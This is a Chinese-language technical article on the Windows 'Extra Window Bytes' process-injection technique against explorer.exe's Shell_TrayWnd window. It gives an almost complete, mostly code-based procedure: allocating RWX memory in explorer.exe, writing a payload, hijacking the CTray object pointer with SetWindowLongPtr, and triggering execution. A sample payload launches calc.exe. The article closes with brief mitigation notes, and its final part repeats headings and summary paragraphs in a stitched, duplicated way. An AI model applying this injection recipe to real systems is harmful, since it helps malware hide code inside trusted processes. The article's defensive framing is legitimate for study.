Windows进程注入技术：额外的Window字节篇<\/h1>

技术概述<\/h2>
这种进程注入技术利用Windows窗口对象中的额外字节（Extra Window Bytes）来实现代码注入，最早可追溯到2013年左右的Powerloader恶意软件。该技术基于Windows操作系统中长期存在的功能，可能早在80年代末或90年代初就已存在。<\/p>

技术原理<\/h2>

窗口额外字节机制<\/h3>

Windows窗口对象在索引0处的内容可用于将类对象与窗口相关联。关键API函数：<\/p>

SetWindowLongPtr<\/code>: 将指向类对象的指针存储到索引0处<\/li>

GetWindowLongPtr<\/code>: 从索引0处检索指针<\/li>
<\/ul>
Shell_TrayWnd窗口<\/h3>
该技术常使用"Shell_TrayWnd"窗口作为注入向量，这是Windows任务栏的主窗口，由explorer.exe进程拥有。<\/p>
技术实现细节<\/h2>
CTray类结构<\/h3>
CTray是Shell_TrayWnd窗口使用的类，其结构定义如下：<\/p>
\/\/ CTray object for Shell_TrayWnd
<\/span><\/span><\/span><\/span>typedef<\/span> struct<\/span> _ctray_vtable {
<\/span><\/span>    ULONG_PTR vTable;    \/\/ 虚表指针(需改为远程内存地址)
<\/span><\/span><\/span><\/span>    ULONG_PTR AddRef;    \/\/ 引用计数方法
<\/span><\/span><\/span><\/span>    ULONG_PTR Release;   \/\/ 释放方法
<\/span><\/span><\/span><\/span>    ULONG_PTR WndProc;   \/\/ 窗口过程(改为payload地址)
<\/span><\/span><\/span><\/span>} CTray;
<\/span><\/span><\/code><\/pre>注意：<\/p>

ULONG_PTR<\/code>在32位系统上是4字节，64位上是8字节<\/li>
不能直接覆盖原始对象的WndProc指针(因为它是只读的)<\/li>
需要复制现有对象到本地内存，修改WndProc后写入explorer.exe进程的新位置<\/li>
<\/ul>
有效载荷设计<\/h3>
有效载荷需要遵循特定的函数原型，否则可能导致explorer.exe崩溃：<\/p>
LRESULT CALLBACK WndProc<\/span>(
<\/span><\/span>    HWND hWnd, 
<\/span><\/span>    UINT uMsg, 
<\/span><\/span>    WPARAM wParam, 
<\/span><\/span>    LPARAM lParam
<\/span><\/span>)
<\/span><\/span>{
<\/span><\/span>    \/\/ 只处理WM_CLOSE消息，忽略其他消息
<\/span><\/span><\/span><\/span>    if<\/span>(uMsg !=<\/span> WM_CLOSE) 
<\/span><\/span>        return<\/span> 0<\/span>;
<\/span><\/span>    
<\/span><\/span>    \/\/ 示例：执行calc.exe
<\/span><\/span><\/span><\/span>    WinExec_t pWinExec;
<\/span><\/span>    DWORD szWinExec[2<\/span>], szCalc[2<\/span>];
<\/span><\/span>    
<\/span><\/span>    \/\/ "WinExec"的ASCII编码
<\/span><\/span><\/span><\/span>    szWinExec[0<\/span>] =<\/span> 0x456E6957<\/span>;
<\/span><\/span>    szWinExec[1<\/span>] =<\/span> 0x00636578<\/span>;
<\/span><\/span>    
<\/span><\/span>    \/\/ "calc"的ASCII编码
<\/span><\/span><\/span><\/span>    szCalc[0<\/span>] =<\/span> 0x636C6163<\/span>;
<\/span><\/span>    szCalc[1<\/span>] =<\/span> 0<\/span>;
<\/span><\/span>    
<\/span><\/span>    \/\/ 获取WinExec函数地址
<\/span><\/span><\/span><\/span>    pWinExec =<\/span> (WinExec_t)xGetProcAddress(szWinExec);
<\/span><\/span>    
<\/span><\/span>    if<\/span>(pWinExec !=<\/span> NULL) {
<\/span><\/span>        pWinExec((LPSTR)szCalc, SW_SHOW);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>完整注入流程<\/h2>


获取Shell_TrayWnd窗口句柄<\/strong><\/p>
hw =<\/span> FindWindow("Shell_TrayWnd"<\/span>, NULL);
<\/span><\/span><\/code><\/pre><\/li>

获取explorer.exe进程ID<\/strong><\/p>
GetWindowThreadProcessId(hw, &<\/span>pid);
<\/span><\/span><\/code><\/pre><\/li>

打开explorer.exe进程<\/strong><\/p>
hp =<\/span> OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
<\/span><\/span><\/code><\/pre><\/li>

获取当前CTray对象指针<\/strong><\/p>
ctp =<\/span> GetWindowLongPtr(hw, 0<\/span>);
<\/span><\/span><\/code><\/pre><\/li>

读取当前CTray对象的虚表指针<\/strong><\/p>
ReadProcessMemory(hp, (LPVOID)ctp, (LPVOID)&<\/span>ct.vTable, sizeof<\/span>(ULONG_PTR), &<\/span>wr);
<\/span><\/span><\/code><\/pre><\/li>

从虚表读取三个方法地址<\/strong><\/p>
ReadProcessMemory(hp, (LPVOID)ct.vTable, (LPVOID)&<\/span>ct.AddRef, sizeof<\/span>(ULONG_PTR)*<\/span>3<\/span>, &<\/span>wr);
<\/span><\/span><\/code><\/pre><\/li>

在目标进程分配RWX内存用于代码<\/strong><\/p>
cs =<\/span> VirtualAllocEx(hp, NULL, payloadSize, MEM_COMMIT|<\/span>MEM_RESERVE, PAGE_EXECUTE_READWRITE);
<\/span><\/span><\/code><\/pre><\/li>

将有效载荷代码写入目标进程<\/strong><\/p>
WriteProcessMemory(hp, cs, payload, payloadSize, &<\/span>wr);
<\/span><\/span><\/code><\/pre><\/li>

在目标进程分配RW内存用于新CTray对象<\/strong><\/p>
ds =<\/span> VirtualAllocEx(hp, NULL, sizeof<\/span>(ct), MEM_COMMIT|<\/span>MEM_RESERVE, PAGE_READWRITE);
<\/span><\/span><\/code><\/pre><\/li>

构造并写入新的CTray对象<\/strong><\/p>
ct.vTable =<\/span> (ULONG_PTR)ds +<\/span> sizeof<\/span>(ULONG_PTR);
<\/span><\/span>ct.WndProc =<\/span> (ULONG_PTR)cs;
<\/span><\/span>WriteProcessMemory(hp, ds, &<\/span>ct, sizeof<\/span>(ct), &<\/span>wr);
<\/span><\/span><\/code><\/pre><\/li>

设置新的CTray对象指针<\/strong><\/p>
SetWindowLongPtr(hw, 0<\/span>, (ULONG_PTR)ds);
<\/span><\/span><\/code><\/pre><\/li>

触发有效载荷<\/strong><\/p>
PostMessage(hw, WM_CLOSE, 0<\/span>, 0<\/span>);
<\/span><\/span><\/code><\/pre><\/li>

恢复原始CTray对象<\/strong><\/p>
SetWindowLongPtr(hw, 0<\/span>, ctp);
<\/span><\/span><\/code><\/pre><\/li>

清理资源<\/strong><\/p>
VirtualFreeEx(hp, cs, 0<\/span>, MEM_DECOMMIT|<\/span>MEM_RELEASE);
<\/span><\/span>VirtualFreeEx(hp, ds, 0<\/span>, MEM_DECOMMIT|<\/span>MEM_RELEASE);
<\/span><\/span>CloseHandle(hp);
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
技术限制与防护<\/h2>

UIPI缓解<\/strong>：自Windows Vista引入的用户界面权限隔离(UIPI)在一定程度上缓解了此类攻击<\/li>
兼容性<\/strong>：该技术在最新版Windows 10上仍然有效<\/li>
防护措施<\/strong>：

监控对SetWindowLongPtr<\/code>的调用<\/li>
检查窗口过程是否被修改<\/li>
实施完整性检查<\/li>
<\/ul>
<\/li>
<\/ul>
总结<\/h2>
这种窗口对象注入技术属于"粉碎窗口攻击"(Window Shattering Attack)类型，虽然有一定防护措施，但仍然是一个有效的注入方法。理解这种技术有助于开发更好的防御机制和检测方法。<\/p>

Windows进程注入技术：额外的Window字节篇<\/h1>

技术原理<\/h2>

Shell_TrayWnd窗口<\/h3> 该技术常使用"Shell_TrayWnd"窗口作为注入向量，这是Windows任务栏的主窗口，由explorer.exe进程拥有。<\/p>

技术实现细节<\/h2>

总结<\/h2> 这种窗口对象注入技术属于"粉碎窗口攻击"(Window Shattering Attack)类型，虽然有一定防护措施，但仍然是一个有效的注入方法。理解这种技术有助于开发更好的防御机制和检测方法。<\/p>

Shell_TrayWnd窗口<\/h3>
该技术常使用"Shell_TrayWnd"窗口作为注入向量，这是Windows任务栏的主窗口，由explorer.exe进程拥有。<\/p>

总结<\/h2>
这种窗口对象注入技术属于"粉碎窗口攻击"(Window Shattering Attack)类型，虽然有一定防护措施，但仍然是一个有效的注入方法。理解这种技术有助于开发更好的防御机制和检测方法。<\/p>